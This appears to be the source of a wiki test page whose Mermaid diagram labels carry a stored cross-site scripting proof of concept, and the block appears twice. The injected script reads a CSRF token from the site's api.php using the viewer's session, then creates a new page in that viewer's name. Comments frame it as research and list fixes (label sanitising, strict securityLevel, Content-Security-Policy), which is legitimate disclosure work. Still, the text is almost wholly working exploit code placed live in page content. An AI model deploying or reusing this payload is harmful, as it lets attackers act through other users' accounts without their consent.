Mermaid:Test page2
sequenceDiagram
participant Alice <u>test</u><script>
// Proof-of-concept payload carried in the participant label of the enclosing
// Mermaid sequence diagram. It is written to show that markup placed in a
// diagram label can reach the page as live HTML, in which case this code runs
// with the session of whoever views the page.
// Defender notes: the fix belongs in the renderer (escape or sanitise label
// text, keep the Mermaid securityLevel setting at strict), backed by a
// Content-Security-Policy that refuses inline script. An anti-CSRF token gives
// no protection here, because same-origin script can ask the API for one, as
// the first request below does.
// NOTE(review): every name below is assigned without var, let or const, so in
// non-strict code each one becomes a global on the viewed page.
x=new XMLHttpRequest();
// Fixed prefix plus the current time in milliseconds, so each run names a
// different page. The XSS_Page_ prefix is a useful string to search for when
// auditing page creation logs.
page_title = "XSS_Page_"+(new Date().getTime());
// Handler for the token request opened at the bottom of the script.
x.onload=function(){
console.log(this.responseText);
resp = JSON.parse(this.responseText);
// Reads the edit token from the JSON reply at query.tokens.csrftoken.
csrf_token = resp['query']['tokens']['csrftoken'];
console.log("CSRF Token: ", csrf_token);
// now make a request on behalf of the user
// Second request: a form-encoded POST to api.php with action=edit against the
// freshly named page, authorised by the token obtained above.
x2 = new XMLHttpRequest();
// Handler for the edit request: logs the reply and the URL of the new page.
x2.onload=function(){
console.log(this.responseText);
console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
};
x2.open("POST", "https://cheekyfactor.com/api.php");
x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
// Only the token is URL-encoded. page_title is concatenated as is, which is
// safe here because it holds only letters, digits and underscores.
x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
};
// First request: asks api.php for a csrf token in JSON form. No credentials are
// set explicitly. Presumably the page is served from the same origin as
// api.php, so the browser attaches the cookies of the viewer - confirm.
x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf");
x.send();
</script>
sequenceDiagram
participant Alice <u>test</u><script>
// Proof-of-concept payload carried in the participant label of the enclosing
// Mermaid sequence diagram. It is written to show that markup placed in a
// diagram label can reach the page as live HTML, in which case this code runs
// with the session of whoever views the page.
// Defender notes: escape or sanitise label text in the renderer, keep the
// Mermaid securityLevel setting at strict, and serve a Content-Security-Policy
// that refuses inline script. An anti-CSRF token gives no protection against
// same-origin script, which can request a token from the API itself.
// NOTE(review): every name below is assigned without var, let or const, so in
// non-strict code each one becomes a global on the viewed page.
x=new XMLHttpRequest();
// Fixed prefix plus the current time in milliseconds, so each run names a
// different page. Searching page logs for the XSS_Page_ prefix finds past runs.
page_title = "XSS_Page_"+(new Date().getTime());
// Handler for the token request opened at the bottom of the script.
x.onload=function(){
console.log(this.responseText);
resp = JSON.parse(this.responseText);
// Reads the edit token from the JSON reply at query.tokens.csrftoken.
csrf_token = resp['query']['tokens']['csrftoken'];
console.log("CSRF Token: ", csrf_token);
// now make a request on behalf of the user
// Second request: a form-encoded POST to api.php with action=edit against the
// freshly named page, authorised by the token obtained above.
x2 = new XMLHttpRequest();
// Handler for the edit request: logs the reply and the URL of the new page.
x2.onload=function(){
console.log(this.responseText);
console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
};
x2.open("POST", "https://cheekyfactor.com/api.php");
x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
// Only the token is URL-encoded. page_title is concatenated as is, which is
// safe here because it holds only letters, digits and underscores.
x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
};
// First request: asks api.php for a csrf token in JSON form. No credentials are
// set explicitly. Presumably the page is served from the same origin as
// api.php, so the browser attaches the cookies of the viewer - confirm.
x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf");
x.send();
</script>